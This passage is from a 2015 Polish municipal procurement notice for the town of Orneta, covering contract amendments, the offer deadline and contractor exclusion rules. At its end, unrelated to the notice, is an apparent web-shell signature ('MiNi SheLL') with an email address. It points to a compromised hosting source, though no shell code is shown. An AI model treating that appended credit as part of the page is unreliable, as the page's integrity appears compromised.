3.Niezależnie od powyższych zmian, Zamawiający dopuszcza możliwość zmian redakcyjnych Umowy oraz zmian będących następstwem zmian danych stron ujawnionych w rejestrach publicznych, a także zmian korzystnych z punktu widzenia realizacji przedmiotu Umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie, utrzymanie lub użytkowanie przedmiotu Umowy bądź zwiększających użyteczność przedmiotu Umowy. W takiej sytuacji, Zamawiający i Wykonawca wprowadzą do Umowy stosowne zmiany weryfikujące redakcyjne dotychczasowe jego brzmienie bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też kierując się poszanowaniem wzajemnych interesów, zasadą równości stron oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu Umowy, określą zmiany korzystne z punktu widzenia realizacji przedmiotu Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> orneta-umig.bip-um.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ornecie 11-130 Orneta, Plac Wolności 26 - Stanowisko d/s Zamówień publicznych pokój nr 11 (budynek Ratusza).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2015 godzina 11:00, miejsce: Urząd Miejski w Ornecie 11-130 Orneta, Plac Wolności 26 - Sekretariat pok. nr 3..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia wykonawcę, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia....</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com